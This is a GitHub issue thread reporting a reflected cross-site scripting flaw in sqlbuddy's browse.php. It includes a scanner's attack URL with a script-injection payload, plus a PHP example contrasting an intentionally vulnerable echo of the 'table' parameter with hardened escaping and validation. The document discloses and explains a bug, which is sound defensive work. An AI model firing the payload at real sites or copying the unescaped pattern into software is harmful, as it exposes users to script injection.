deliciousbrains / sqlbuddy

phpMyAdmin alternative with a focus on usability
http://sqlbuddy.com
MIT License

Cross-Site Scripting in 'browse.php' #9

Closed omarkurt closed 8 years ago

omarkurt commented 10 years ago

Netsparker found XSS in browse.php

URL: http://example.com/sqlbuddy/browse.php?ajaxRequest=89&requestKey=be91e6d9714bb1c4&db=information_schema&table='"--></style></scRipt><scRipt>alert(0x000290)</scRipt>
Parameter Name: table
Parameter Type: Querystring
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000290)</scRipt>

Reference:
https://www.netsparker.com/crosssite-scripting-xss/
https://www.netsparker.com/netsparker-advisories/

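The scanner payload above only fires if browse.php copies the `table` query-string value into the response without escaping; the leading `'"-->` and `</style></scRipt>` pieces are there to close whatever attribute, comment, style or script context the value happens to land in before the injected `<scRipt>` opens. The following is an added example and not sqlbuddy's code: it assumes a page that prints the selected table name into a heading and into an inline script block, and shows that pattern beside a hardened form (HTML-escape for markup, JSON-encode with hex flags for script data, and validation of the name against the tables the database actually has).

```php
<?php
// Added example, not taken from sqlbuddy. Demonstrates why the reported
// payload executes and how output encoding plus input validation stop it.

// Assumed vulnerable pattern: the query-string value is echoed straight into
// HTML and into a script block. Anything in $table becomes markup.
function render_vulnerable(string $table): string
{
    return "<h1>Browsing $table</h1>\n"
         . "<script>var table = '$table';</script>\n";
}

// Hardened output. htmlspecialchars() neutralises <, >, ", ' and & in element
// content; json_encode() with the JSON_HEX_* flags turns those same characters
// into \u00XX escapes, so "</script>" inside the value cannot end the block.
function render_safe(string $table): string
{
    $html = htmlspecialchars($table, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $js = json_encode(
        $table,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
    return "<h1>Browsing $html</h1>\n"
         . "<script>var table = $js;</script>\n";
}

// Input validation: a table name is only acceptable if the selected database
// actually contains it. The lookup is parameterised, so the untrusted value
// never reaches the SQL text either. (PDO connection details are assumed.)
function valid_table(PDO $pdo, string $db, string $table): bool
{
    $stmt = $pdo->prepare(
        'SELECT 1 FROM information_schema.TABLES
          WHERE TABLE_SCHEMA = ? AND TABLE_NAME = ? LIMIT 1'
    );
    $stmt->execute([$db, $table]);
    return (bool) $stmt->fetchColumn();
}

// The attack pattern from the report, as a PHP string literal.
$payload = '\'"--></style></scRipt><scRipt>alert(0x000290)</scRipt>';

echo render_vulnerable($payload);   // injected <scRipt> element is part of the page
echo render_safe($payload);         // same characters rendered as inert text
```

In a real handler the two measures are complementary: `valid_table()` rejects the request before any rendering happens, and the encoding in `render_safe()` still protects the page for the legitimate case of a table name that contains characters such as `<` or `'`. Encoding must match the context the value lands in, which is why the heading and the script block use different functions.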
gilbitron commented 8 years ago

Closing this as we are planning a ground up rewrite for v2.0.